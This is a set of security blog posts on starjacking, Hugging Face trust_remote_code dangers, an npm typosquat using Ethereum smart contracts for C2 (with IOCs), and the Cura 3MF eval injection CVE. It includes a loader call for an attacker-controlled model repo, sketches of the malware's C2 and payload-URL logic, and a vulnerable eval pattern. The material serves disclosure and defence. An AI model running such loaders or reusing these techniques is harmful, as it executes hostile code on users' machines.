PyPI                  Python
NuGet                 C#
pkg.go.dev            Go
Packagist             PHP
RubyGems              Ruby
crates.io             Rust
CocoaPods             ObjC/Swift
Pub.dev               Dart
CPAN                  Perl
CRAN                  R
Clojars               Clojure
Yarn                  JS
Anaconda              Python, R
LuaRocks              Lua
Hackage               Haskell
Opam                  OCaml
Hex                   Erlang
Meteor                JS
Swift Package Index   Swift

These repositories fall into two primary categories based on their artifact management approaches:
  • Some store the artifacts created during building, compiling, or packaging the code.
  • Others simply provide references to GitHub repositories containing the necessary files for package installation.

Package managers that exclusively reference GitHub repositories, such as pkg.go.dev and RubyGems, are inherently protected against starjacking since they display data directly from GitHub repositories. This direct integration eliminates the possibility of linking to one repository while serving code from another.

GitHub repositories pkg.go.dev web image

While such package repositories are not susceptible to Starjacking, the displayed GitHub statistics can still be misleading: they can be manipulated using more sophisticated techniques. For example, Swift Package Index and Packagist display comprehensive GitHub repository details, which can trick users if the stats are spoofed.

Packagist index web screen shot
Swift index web screen shot

Results

Most repositories do not display the GitHub repository statistics referred to by the package. While PyPI and Yarn previously showed these stats, they’ve since modified their approaches: Yarn has completely removed the statistics while PyPI implemented a more sophisticated metadata display system.   Yet some package repos still display GitHub statistics; for example, npm continues to show the number of issues and pull requests from the GitHub repository specified in the package metadata.

npm index web screenshot

Moreover, the CPAN Perl package repository displays the GitHub stats.

CPAN Perl package repository screenshot

PyPI’s Transformation of GitHub Statistics Display

PyPI slowly but steadily added verification of the package metadata.

Initially, PyPI displayed GitHub repository statistics without any verification mechanism. This approach made the platform vulnerable to starjacking attempts, as any package could claim association with any GitHub repository. PyPI’s first security improvement divided package information into two distinct sections: unverified and verified details.

While this division helped users identify trusted information, statistics of arbitrary GitHub repositories were still shown in the unverified details section. This was a good step towards informing the user which data they can trust. However, this was not enough since most people don’t carefully distinguish between verified and unverified information.

PyPI made a crucial advancement by implementing a comprehensive verification system through the Trusted Publisher Management feature. Starting from August 2024, the platform now ensures GitHub statistics appear exclusively in the verified details section and are only displayed for packages uploaded through the Trusted Publisher Management feature. This system utilizes OpenID Connect to enable secure publishing through trusted services like GitHub Actions.

The new publishing process works as follows: A PyPI project maintainer specifies a workflow in their GitHub repository for automatic package publishing. When triggered, the workflow authenticates with PyPI, proving that the code comes from the intended source. Only after verification can the package be published. Under this new system, PyPI displays GitHub repository statistics only when the links point to verified code repositories that have been authenticated through the trusted publishing workflow.

The evolution of PyPI’s security measures against Starjacking can be seen in three distinct phases (left to right):

  1. Initial phase: GitHub statistics were displayed without any verification or indication of their authenticity.
  2. Second phase: Separation of verified and unverified details, with GitHub statistics specifically placed in the unverified details section.
  3. Current phase: GitHub statistics are now only displayed in the verified details section and appear exclusively for packages uploaded through the Trusted Publisher Management feature.

This progression demonstrates PyPI’s commitment to maintaining security while providing valuable repository information to users.

GitHub project description page screenshot

Conclusion

While npm and CPAN continue to display unverified GitHub statistics, the risk of Starjacking has significantly decreased over the past two years. This improvement stems from most repositories either removing GitHub statistics entirely or implementing more robust verification systems, as exemplified by PyPI. It’s worth noting that most repositories (with PyPI being the exception) still display package metadata links without verification. While this vulnerability could potentially be exploited by malicious actors, it poses a substantially lower risk of misleading users compared to the original Starjacking technique.

“Free Hugs” – What To Be Wary of in Hugging Face – Part 1
https://checkmarx.com/blog/free-hugs-what-to-be-wary-of-in-hugging-face-part-1/ | Thu, 14 Nov 2024 12:00:00 +0000

Introduction

GenAI has taken the world by storm. To meet the demand for developing LLM/GenAI technology through open source, various vendors have risen to spread this technology.

One well-known platform is Hugging Face – an open-source platform that hosts GenAI models. It is not unlike GitHub in many ways – it’s used for serving content (such as models, datasets and code), version control, issue tracking, discussions and more. It also allows running GenAI-driven apps in online sandboxes. It’s very comprehensive and at this point a mature platform chock full of GenAI content, from text to media. 

In this series of blog posts, we will explore the various potential risks present in the Hugging Face ecosystem. 

Championing logo design Don’ts (sorry not sorry opinions my own) 

Hugging Face Toolbox and Its Risks 

Beyond hosting models and associated code, Hugging Face is also a maintainer of multiple libraries for interfacing with all this goodness – libraries for uploading models to the Hugging Face platform, downloading them, and executing them. From a security standpoint – this offers a HUGE attack surface to spread malicious content through. A lot has already been said about that vast attack surface and many things have been tested in the Hugging Face ecosystem, but many legacy vulnerabilities persist, and bad security practices still reign supreme in code and documentation; these can bring an organization to its knees (while being practiced by major vendors!) and known issues are shrugged off because “that’s just the way it is” – while new solutions suffer from their own set of problems.

ReadMe.md? More Like “TrustMe.md” 

The crux of all potentially dangerous behavior around marketplaces and repositories is trust – trusting the content’s host, trusting the content’s maintainer and trusting that no one is going to pwn either. This is also why environments that allow obscuring malicious code or ways to execute it are often more precarious for defenders. 

While downloading things from Hugging Face is trivial, actually using them is finicky – in that there is no one global, definitive way to do so, and trying to do it any other way than the one recommended by the vendor will likely end in failure. Figuring out how to use a model always boils down to RTFM – the ReadMe.

But can ReadMe files be trusted? Like all code, there are good and bad practices – even major vendors fall for that. For example, Apple actively uses dangerous flags when instructing users on loading their models: 

trust_remote_code sounds like a very reasonable flag to set to True 

There are many ways to dangerously introduce code into the process, simply because users are bound to trust what the ReadMe presents to them. They can be led to load malicious code, or to load malicious models, in a manner that is both dangerous and very obscure.

Configuration-Based Code Execution Vectors 

Let’s start by examining the above configuration in its natural habitat.

 Transformers is one of the many tools Hugging Face provides users with, and its purpose is to normalize the process of loading models, tokenizers and more with the likes of AutoModel and AutoTokenizer. It wraps around many of the aforementioned technologies and mostly does a good job only utilizing secure calls and flags. 

However – all of that security goes out the window once code execution is enabled for custom models, which load as Python code behind a flag, “trust_remote_code=True”. This flag allows loading model and tokenizer classes that require additional code and a custom implementation to run.

While it sounds like a terrible practice that should be rarely used, this flag is commonly set to True. Apple was already mentioned, so here’s a Microsoft example: 

why wouldn’t you trust remote code from Microsoft? What are they going to do, force install Window 11 on y- uh oh it’s installing Windows 11 

Using these configurations with an unsecure model could lead to unfortunate results. 

Code loads dangerous config → config loads code module → code loads OS command

  • Code will attempt to load an AutoModel from a config with the trust_remote_code flag 
  • Config will then attempt to load a custom class model from “exploit.SomeTokenizer” which will import “exploit” first, and then look for “SomeTokenizer” in that module 
  • SomeTokenizer class doesn’t exist, but exploit.py has already been loaded and has executed malicious commands

This works for auto-models and auto-tokenizers, and in transformer pipelines: 

in this case the model is valid, but the tokenizer is evil. Even easier to hide behind! 

Essentially this paves the way to malicious configurations – ones that seem secure but aren’t. There are plenty of ways to make a True flag look like a False flag in plain sight:

  • False is False 
  • {False} is True – it’s a non-empty set
  • “False” is True – it’s a str 
  • False < 1 – is True, just squeeze it to the side: 

This flag is set as trust_remote_code=False……………………………………………………………………………….………….n’t 

While these are general parlor tricks to hide True statements, and they are absolutely not exclusive to any of the code we’ve discussed – hiding a dangerous flag in plain sight is still rather simple. However, the terrible practice by major vendors of making this flag popular and expected means such trickery might not even be required – it can just be set to True.
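
To spell out the list above, here is a tiny sketch showing how each of those expressions evaluates – anything truthy passed as trust_remote_code silently enables remote code:

# Each of these values is truthy, despite containing or resembling "False".
for value in ({False}, "False", False < 1):
    print(repr(value), "->", bool(value))

# {False}  -> True  (a non-empty set)
# 'False'  -> True  (a non-empty string)
# True     -> True  (False < 1 evaluates to True)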

Of course, this entire thing can be hosted on Hugging Face – models are uploaded to repos in profiles. Providing the name of the profile and repo will automatically download and unpack the model, only to load arbitrary code. 

import transformers 

yit = transformers.AutoTokenizer.from_pretrained("dortucx/unkindtokenizer", trust_remote_code=True)

print(yit) 

Go on, try it. You know you want to. What’s the worst that can happen? Probably nothing. Right? Nothing whatsoever. 

Dangerous Coding Practices in ReadMes 

Copy-pasting from ReadMes isn’t just dangerous because they contain configurations in their code, though – ReadMes contain actual code snippets (or whole scripts) to download and run models. 

We will discuss many examples of malicious model loading code in subsequent write-ups but to illustrate the point let’s examine the huggingface_hub library, a Hugging Face client. The hub has various methods for loading models automatically from the online hub, such as “huggingface_hub.from_pretrained_keras”. Google uses it in some of its models: 

And if it’s good enough for Google, it’s good enough for everybody! 

But this exact method also supports dangerous legacy protocols that can execute arbitrary code. For example, here’s a model that is loaded with that exact method via the huggingface_hub client and runs a whoami command:

A TensorFlow model executing a “whoami” command, as one expects! 

Conclusions 

The Hugging Face ecosystem, like all marketplaces and open-source providers, suffers from issues of trust, and like many of its peers – has a variety of blindspots, weaknesses and practices that empower attackers to easily obscure malicious activity.

There are plenty of things to be aware of – for example if you see the trust_remote_code flag being set to True – tread carefully. Validate the code referenced by the auto configuration.  
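
One lightweight way to do that validation is to pull down only the repository’s config.json and look at what custom code it declares before loading anything. The repo name below is a placeholder, and the “auto_map” key is simply where transformers-style configs typically point at custom classes – treat this as a sketch, not a complete vetting process:

import json

from huggingface_hub import hf_hub_download

# Download just the config file - not the model weights or any custom code.
config_path = hf_hub_download(repo_id="some-vendor/some-model", filename="config.json")
with open(config_path) as f:
    config = json.load(f)

auto_map = config.get("auto_map")
if auto_map:
    print("Custom code declared - review these modules before trusting them:", auto_map)
else:
    print("No auto_map entry - standard library classes will be used")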

Another always-true recommendation is to simply avoid untrusted vendors and models. A model from a trusted vendor is only trustworthy until that vendor’s account is compromised, but any model from an untrusted vendor is always highly suspect.

As a broader but more thorough methodology, however, a user who wants to securely rely on Hugging Face as a provider should be aware of many things – hidden evals, unsafe model loading frameworks, hidden importers, fishy configuration and many, many more.  It’s why one should read the rest of these write-ups on the matter. 

On The Next Episode… 

Now that we’ve discussed the very basics of setting up a model – we’ve got exploit deep-dives, we’ve got scanner bypasses, and we’ve also got more exploits. Stay tuned. 

October 2024 in Software Supply Chain Security
https://checkmarx.com/blog/october-2024-in-software-supply-chain-security/ | Tue, 12 Nov 2024 16:02:41 +0000

October 2024 heralded a new chapter in supply chain security challenges, characterized by innovative attack techniques and cryptocurrency-focused threats. A groundbreaking entry point exploitation technique affecting multiple package ecosystems was unveiled, while the NPM ecosystem witnessed the first-ever use of Ethereum smart contracts for malware C2 infrastructure. The month also saw multiple sophisticated attacks on cryptocurrency wallets through PyPI packages and a notable compromise of the popular lottie-player package, despite 2FA protections, highlighting the increasing complexity of supply chain security threats.

Let’s delve into some of the most striking events of October:

This New Supply Chain Attack Technique Can Trojanize All Your CLI Commands

A new supply chain attack technique exploits entry points in various programming ecosystems, allowing attackers to trojanize CLI commands. This stealthy method poses risks to developers and enterprises, bypassing traditional security checks. (Link to report).

With 2FA Enabled: NPM Package lottie-player Taken Over by Attackers

NPM package lottie-player compromised via leaked automation token, bypassing 2FA. Malicious versions injected code to trick users into connecting crypto wallets. Swift response: safe version released, compromised versions unpublished. (Link to report).

Crypto-Stealing Code Lurking in Python Package Dependencies

A sophisticated cyber attack on PyPI targeted cryptocurrency wallets through malicious packages. The attack used deceptive strategies, distributed malicious code across dependencies, and only activated when specific functions were called, making detection challenging. (Link to report).

Crypto-Stealing Code Lurking in Python Package Dependencies attack flow

Cryptocurrency Enthusiasts Targeted in Multi-Vector Supply Chain Attack

A malicious PyPI package “cryptoaitools” targeted cryptocurrency enthusiasts through a multi-vector supply chain attack. It used deceptive GUI, multi-stage infection, and comprehensive data exfiltration to steal crypto-related information from Windows and macOS users. (Link to report).

Cryptocurrency Enthusiasts Targeted in Multi-Vector Supply Chain Attack image

Supply Chain Attack Using Ethereum Smart Contracts to Distribute Multi-Platform Malware

A sophisticated NPM supply chain attack uses Ethereum smart contracts for C2 distribution. The cross-platform malware, targeting popular testing packages, affects Windows, Linux, and macOS through Typosquatting and preinstall scripts. (Link to report)

Ethereum Smart Contracts attack flow

*   *   *

Our team will continue to hunt, squash attacks, and remove malicious packages in our effort to keep the open-source ecosystem safe.

I encourage you to stay up to date with the latest trends and tactics in software supply chain security by tuning into our future posts and learning how to defend against potential threats.

Stay tuned…

Working to Keep the Open Source Ecosystem Safe

Supply Chain Attack Using Ethereum Smart Contracts to Distribute Multi-Platform Malware https://checkmarx.com/uncategorized/supply-chain-attack-using-ethereum-smart-contracts-to-distribute-multi-platform-malware/ Mon, 04 Nov 2024 09:47:48 +0000 https://checkmarx.com/?p=98670 As part of our ongoing security efforts, we continuously monitor and detect malicious packages within various software ecosystems. Recently, we uncovered a unique supply chain attack through the NPM package “jest-fet-mock,” which implements a different approach using Ethereum smart contracts for command-and-control operations. The package masquerades as a popular testing utility while distributing malware across Windows, Linux, and macOS platforms. This discovery represents a notable difference in supply chain attack methodologies, combining blockchain technology with traditional attack vectors in a way not previously observed in npm. jest-fet-mock was the first package identified in a larger ongoing campaign targeting the npm ecosystem. Additional packages connected to this campaign were later reported by security firms Phylum and Socket.

Key Findings

  • First observed instance of malware utilizing Ethereum smart contracts for C2 server address distribution in the NPM ecosystem.
  • Typosquatting attack targeting developers by impersonating two legitimate, popular testing packages.
  • Cross-platform malware targeting Windows, Linux, and macOS development environments.
  • Uses NPM preinstall scripts to execute malicious code during package installation.
  • Performs info-stealing actions while establishing persistence mechanisms across infected systems.

The Art of Impersonation

jest-fet-mock package screenshot

The malicious package “jest-fet-mock”, published in mid-October, was designed to impersonate two legitimate and widely used JavaScript testing utilities.

The first, “fetch-mock-jest” (~200K weekly downloads), is a wrapper around fetch-mock that enables HTTP request mocking in Jest environments.

The second, “Jest-Fetch-Mock” (~1.3M weekly downloads), provides similar functionality through Jest’s native mocking capabilities.

Both legitimate packages are tools for testing HTTP requests in JavaScript applications. The attacker used a classic typosquatting technique by misspelling “fetch” as “fet” while maintaining the key terms “jest” and “mock”. Given that the legitimate packages are primarily used in development environments where developers typically have elevated system privileges, and are often integrated into CI/CD pipelines, we believe this attack specifically targets development infrastructure through the compromise of testing environments.

Attack Flow

Ethereum Smart Contracts Supply Chain Attack Flow Diagram

Blockchain-Based Command & Control

Etherscan transaction Screenshot
Etherscan transaction details showing the smart contract’s getString method returning the C2 server address

The most distinctive aspect of this attack is how it leverages the Ethereum blockchain for its command-and-control infrastructure. When executed, the malware interacts with a smart contract at address "0xa1b40044EBc2794f207D45143Bd82a1B86156c6b". Specifically, it calls the contract's "getString" method, passing "0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84" as a parameter to retrieve its C2 server address.

By using the blockchain in this way, the attackers gain two key advantages: their infrastructure becomes virtually impossible to take down due to the blockchain’s immutable nature, and the decentralized architecture makes it extremely difficult to block these communications.

Understanding the Smart Contract Mechanism

Think of a smart contract on the Ethereum blockchain as a public bulletin board – anyone can read what’s posted, but only the owner has the ability to update it. The attackers in this case deployed such a contract, using it to store their C2 server address. Every time the malicious package is installed on a new system, it checks this bulletin board to find out where to download the actual malware. What makes this approach particularly effective is its flexibility. Instead of hardcoding server addresses in their malware, the attackers can simply update their smart contract whenever they need to point to a new server. This means that even if defenders successfully block one C2 server, the attackers can quickly switch to a new one by updating their contract, and all new infections will automatically connect to the new location.
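To make this concrete, here is a minimal sketch of how anyone can read that value off the chain with web3.py. The RPC endpoint is illustrative, and the one-method ABI is an assumption based on the observed getString call:

from web3 import Web3

RPC_URL = "https://ethereum-rpc.example.org"  # illustrative public RPC endpoint
CONTRACT = "0xa1b40044EBc2794f207D45143Bd82a1B86156c6b"
PARAM = "0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84"

# Hand-written ABI fragment covering only the method the malware calls;
# assumed to be a view function taking an address and returning a string.
ABI = [{
    "name": "getString",
    "type": "function",
    "stateMutability": "view",
    "inputs": [{"name": "account", "type": "address"}],
    "outputs": [{"name": "", "type": "string"}],
}]

w3 = Web3(Web3.HTTPProvider(RPC_URL))
contract = w3.eth.contract(address=Web3.to_checksum_address(CONTRACT), abi=ABI)

# A read-only call: free, unauthenticated, and available to every new infection.
print(contract.functions.getString(Web3.to_checksum_address(PARAM)).call())

Because this is a public view call, defenders can query the same contract to see where the C2 currently points.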

 Ethereum code screenshot

Initial Execution

The attack chain begins during the npm package installation process through the preinstall script. This script determines the host operating system and constructs a platform-specific URL to download the appropriate payload. The malware then spawns a detached process, ensuring the malicious code continues running independently of the installation process.
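The actual preinstall hook is JavaScript, but its logic is simple enough to sketch in a few lines of Python. The payload names are taken from the IOCs below; the download-and-detach step is summarized in a comment rather than reproduced:

import platform

# Platform-specific payload names observed in this campaign (see IOCs).
PAYLOADS = {
    "Windows": "node-win.exe",
    "Linux": "node-linux",
    "Darwin": "node-macos",
}

payload = PAYLOADS.get(platform.system())
url = f"http://<c2-address>:3001/{payload}"  # C2 address resolved via the smart contract

# The real script then downloads the payload and launches it as a detached
# process, so it keeps running after "npm install" finishes.
print(url)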

Multi-Platform Malware

Our analysis revealed distinct malware variants designed for:

Windows (SHA-256: df67a118cacf68ffe5610e8acddbe38db9fb702b473c941f4ea0320943ef32ba),

Linux (SHA-256: 0801b24d2708b3f6195c8156d3661c027d678f5be064906db4fefe74e1a74b17),

and macOS (SHA-256: 3f4445eaf22cf236b5aeff5a5c24bf6dbc4c25dc926239b8732b351b09698653).

Notably, as of this writing, none of these files have been flagged as malicious by any security vendors on VirusTotal.

The malware variants demonstrated various capabilities including system reconnaissance, credential theft, and establishing persistence through platform-specific mechanisms – using AutoStart files in Linux and Launch Agent configuration (~/Library/LaunchAgents/com.user.startup.plist) in macOS.

Throughout their operation, all variants maintain consistent communication with the attacker’s C2 server, showcasing a coordinated cross-platform attack strategy aimed at compromising development environments.
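For defenders, these artifacts are straightforward to sweep for. A minimal sketch follows; the Launch Agent path comes from this analysis and the hashes from the IOC list below:

import hashlib
import pathlib

# SHA-256 hashes of the three payloads identified in this campaign.
KNOWN_HASHES = {
    "df67a118cacf68ffe5610e8acddbe38db9fb702b473c941f4ea0320943ef32ba",  # Windows
    "0801b24d2708b3f6195c8156d3661c027d678f5be064906db4fefe74e1a74b17",  # Linux
    "3f4445eaf22cf236b5aeff5a5c24bf6dbc4c25dc926239b8732b351b09698653",  # macOS
}

# macOS persistence artifact described above.
plist = pathlib.Path.home() / "Library/LaunchAgents/com.user.startup.plist"
if plist.exists():
    print(f"[!] Suspicious Launch Agent present: {plist}")

def sha256(path: pathlib.Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

# Compare any suspicious binary against the known payload hashes, e.g.:
# if sha256(pathlib.Path("./node-linux")) in KNOWN_HASHES: print("[!] Known payload")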

Impact

By targeting development tools and testing utilities, attackers gain potential access to not only individual developer machines but also CI/CD pipelines and build systems. The use of blockchain technology for C2 infrastructure represents a different approach to supply chain attacks in the npm ecosystem, making the attack infrastructure more resilient to takedown attempts while complicating detection efforts.

The cross-platform nature of the malware, coupled with the fact that no security vendors have flagged these files as malicious on VirusTotal at the time of writing, makes this an actively dangerous threat to development environments.

Conclusion

The discovery of “jest-fet-mock” reveals how threat actors are finding different ways to compromise the software supply chain. This case serves as an important reminder for development teams to implement strict security controls around package management and carefully verify the authenticity of testing utilities, especially those requiring elevated privileges.

This campaign is ongoing, with additional packages connected to the same campaign reported later in the month by Phylum and Socket.

As part of the Checkmarx Supply Chain Security solution, our research team continuously monitors suspicious activities in the open-source software ecosystem. We track and flag “signals” that may indicate foul play, including suspicious entry points, and promptly alert our customers to help protect them from potential threats.

Packages

For the full list of packages related to this campaign see this link:

https://gist.github.com/masteryoda101/d4e90eb8004804d062bc04cf1aec4bc0

IOCs

  • hxxp[:]//193[.]233[.]201[.]21:3001
  • hxxp[:]//193[.]233[.]201[.]21:3001/node-win.exe
  • hxxp[:]//193[.]233[.]201[.]21:3001/node-linux
  • hxxp[:]//193[.]233[.]201[.]21:3001/node-macos
  • df67a118cacf68ffe5610e8acddbe38db9fb702b473c941f4ea0320943ef32ba
  • 0801b24d2708b3f6195c8156d3661c027d678f5be064906db4fefe74e1a74b17
  • 3f4445eaf22cf236b5aeff5a5c24bf6dbc4c25dc926239b8732b351b09698653

Pwn3D: Abusing 3D Models for Code Execution  https://checkmarx.com/blog/pwn3d-abusing-3d-models-for-code-execution/ Mon, 04 Nov 2024 09:44:47 +0000 https://checkmarx.com/?p=98468

Preface 

Back in 2016, I was a passionate mechanical engineering student. Though I never graduated and eventually pivoted into AppSec, my love for engineering never faded. Fast forward to 2023: I bought a 3D printer and started playing around with mechanics again. Naturally, I began merging this hobby with my security background, which led me to seek out vulnerabilities in 3D printing software. 

During one of our in-company white hat hacking activities, I took the opportunity to examine several 3D printing open source products. One of them was UltiMaker Cura, a popular slicer that, according to UltiMaker's website, is trusted by millions (more on slicers soon). After scanning Cura with Checkmarx SAST, I uncovered a potential lead for a code injection vulnerability, now tracked as CVE-2024-8374. 

In this blog post, we’ll examine the vulnerable flow and exploitation of CVE-2024-8374. We’ll also share insights into the impact of such vulnerabilities on the open source 3D printing community. Finally, we’ll highlight key takeaways from UltiMaker’s excellent response. 


Introduction 

Slicers 

First things first, what exactly is a slicer? 

Simply put, a slicer is a program that is responsible for transforming a 3D model into a set of instructions (i.e. a gcode file) that the 3D printer can follow to physically print the model.  

Slicing is a vital part of the 3D printing process, and it cannot be skipped. As the name suggests, the slicer divides the 3D model into layers and provides a set of instructions for each one, such as temperature, speed, and more. The printer then processes these instructions, layer by layer, when printing. 

A typical flow of printing a 3D model is: 

  1. Obtaining a model (e.g., download from a public model database or design it yourself) 
  2. Slicing the model (e.g., with UltiMaker Cura) 
  3. Hit PRINT 
  4. Enjoy the 3D print 

3D Model Formats 

Before diving into Cura's source code, we need to take a step back and first discuss the file formats used in 3D printing. There are different 3D model formats, each with different properties and purposes.  

The most popular format for 3D printing is called STL. Another popular format is 3MF, which is essentially a ZIP archive with the `.3mf` extension, holding the model data in XML along with a collection of metadata files.  

The popularity of 3MF is rapidly growing because it adds capabilities that the well-known STL format doesn’t provide, such as color printing. It’s also gained popularity because it is backed by industry leaders including Autodesk and Dassault Systèmes. All of these make it one of the most widely used formats for 3D printing. 

Most importantly, it serves as our payload entry point. 
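Because a 3MF file is just a ZIP archive, a few lines of Python are enough to peek inside one. A minimal sketch, where "model.3mf" is a placeholder path and the internal layout follows the common 3MF convention: 

import zipfile 

with zipfile.ZipFile("model.3mf") as archive:   # "model.3mf" is a placeholder path 
    print(archive.namelist())                   # metadata files plus the model itself 
    # The XML scene description usually lives at 3D/3dmodel.model 
    name = next(n for n in archive.namelist() if n.endswith("3dmodel.model")) 
    print(archive.read(name).decode("utf-8")[:500]) 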

The Vulnerability 

Our journey to Cura’s source code starts in the `_read` method of the `3MFReader.py` plugin, which is responsible for loading 3MF models into Cura before slicing. 

Let’s start by examining this method (the important lines are highlighted in yellow): 

Screenshot of the `_read` method in 3MFReader.py
  1. The function accepts a `file_name` parameter, which is the path to the 3MF model we want to slice (line of code). 
  2. The 3MF model is then parsed by a ZIP reader (as mentioned earlier, a 3MF file is a ZIP archive) (line of code). 
  3. The file `3dmodel.model` is read from the archive. This file contains the actual model data in XML format. Note that Cura stores this information in a variable called `scene_3mf` (line of code). 
  4. Each node from the 3MF file is transformed into an UltiMaker format. Note that the `node` is passed as the first parameter of `_convertSavitarNodeToUMNode` (line of code). 

Examining the flow further, we can move on to `_convertSavitarNodeToUMNode`. This function is quite long, and most of it is not relevant to us, so we'll focus only on the specific lines our input flows to: 

The `node` variable passed by the `_read` function is now called `savitar_node` inside the function `_convertSavitarNodeToUMNode` (line of code). 

  1. Settings are extracted from the `savitar_node` (line of code). 
  2. If `settings` is defined, Cura tries to add them (line of code). 
  3. While iterating over each setting, Cura may find that `drop_to_buildplate` is defined (line of code). 
  4. Once that happens, the value of this setting ends up in a call to `eval`, which results in code execution (line of code) – a simplified sketch of this pattern follows below. 
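Stripped of Cura specifics, the dangerous pattern looks roughly like this. This is a simplified reconstruction for illustration, not UltiMaker's actual code, and the XML structure shown is our own: 

import xml.etree.ElementTree as ET 

def apply_settings(settings_xml: str) -> dict: 
    # Settings arrive as attacker-controlled XML taken from 3dmodel.model. 
    applied = {} 
    for setting in ET.fromstring(settings_xml): 
        key, value = setting.get("key"), setting.text 
        if key == "drop_to_buildplate": 
            # The bug: an attacker-controlled string reaches eval(). 
            applied[key] = eval(value) 
    return applied 

# A benign value such as "True" behaves as intended; arbitrary Python works just as well. 
print(apply_settings('<settings><setting key="drop_to_buildplate">True</setting></settings>')) 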

Exploitation 

By now it seems that we have a weakness because we didn’t see any kind of sanitization in the execution flow.  

To exploit it, we need to verify that we can control the `drop_to_buildplate` property and, if so, to understand the valid XML structure in which we can place the payload. 

Searching for known information about the 3MF format didn’t reveal much about the `drop_to_buildplate` property. However, it looked like this is a feature that is specific to Cura and not used by other slicers, which makes finding this setting in publicly available models quite challenging. Guessing the correct XML format also doesn’t seem to be the best approach in this case. Another alternative is to dive deeper into the source code to learn the appropriate format for setting Cura configurations. But fortunately, I found an easier way:  

Since we know that this property is unique to Cura, we may be able to use Cura itself to generate a valid XML model that contains the `drop_to_buildplate` property for our payload. 

Let's try that by downloading any 3MF model from a public model database. Note that we don't care about anything but the file format (.3mf). For example, in the image below you can see that the specific model I downloaded was created by OnShape (line #9), a 3D design tool, but this metadata will soon be overridden. 

Now, let’s load this 3MF file into Cura and export it back to a 3MF format. The metadata will be converted to the format used by Cura. 

Extracting `3dmodel.model` from the 3MF archive we have just exported confirms our success, revealing a valid 3MF model with Cura’s metadata, including the `drop_to_buildplate` property (line #6): 

Let’s replace the value of `drop_to_buildplate` with Python code that spawns a calculator: 

 
The only thing left to do now is to open our crafted model with Cura – 

Let’s highlight a few things about the exploitation: 

  1. The code is executed with the default Cura configuration. 
  2. The code runs immediately, even before the model is loaded. There's no need to slice or perform any action in Cura. 
  3. The model remains completely valid after tampering, making it appear legitimate from the user's perspective. 
  4. The only way to identify this model as malicious is by examining the XML data. 

This allows a malicious actor to easily download, modify, and redistribute popular models for exploitation. 

But that’s not all – yet. 

A Note About Supply Chain Attacks 

We know already that this vulnerability is quite simple to exploit. Additionally, beyond model databases like Printables and Thingiverse, which are popular among makers and hobbyists, there are also open source repositories for engineering-focused projects, often used by sensitive sectors such as national security contractors, healthcare engineers, and others. The engineers use basic models in several ways, such as building blocks for their own designs or testing purposes. The open source nature of the 3D printing industry makes such vulnerabilities a potential target for supply chain attacks. 

The Fix 

The fix is straightforward: the maintainers removed the unnecessary eval call and replaced it with strict Boolean parsing, as shown here: 

  1. Removing eval 
  2. Boolean parsing 
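In spirit, the fix swaps the eval call for strict Boolean parsing, along these lines (a simplified sketch rather than the exact Cura diff): 

def parse_drop_to_buildplate(value: str) -> bool: 
    # Anything other than the literal string "true" is treated as False, 
    # so arbitrary Python in the 3MF metadata can no longer execute. 
    return value.strip().lower() == "true" 

print(parse_drop_to_buildplate("True"))                                       # True 
print(parse_drop_to_buildplate('__import__("subprocess").Popen(["calc"])'))   # False 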

Another thing to note is that UltiMaker didn't reveal any information about the vulnerability in their commit message: 

This is important because malicious actors frequently scan GitHub for vulnerabilities that were fixed but not yet released. 

UltiMaker’s Response 

UltiMaker responded and acted quickly, implementing a fix in less than 24 hours. The fix was released in the next beta release, `5.8.0-beta.1`, on July 16. UltiMaker's security team was very responsive and provided all the required information for a smooth disclosure process. 

All in all, working with UltiMaker to address this issue was a great experience, and they’ve certainly earned Checkmarx’s Seal of Approval. 

References 

  1. 3D Models – Clean 3MF Model & PoC for Code Execution 
  2. NVD CVE Database 
  3. Commit of the fix 
  4. CWE 94 – Code Injection 

Timeline 

  • 15 June 2024 – Initial contact made with the UltiMaker’s Security team via security@ultimaker.com, providing a comprehensive report on the vulnerability. 
  • 16 June 2024 – UltiMaker responded, confirming the vulnerability. A fix was subsequently implemented and committed on the same day. 
  • 16 July 2024 – Version 5.8.0-beta.1, containing the fix, was released. 
  • 1 August 2024 – Stable version 5.8.0, containing the fix, was released. 
  • 3 September 2024 – CVE number assigned. 
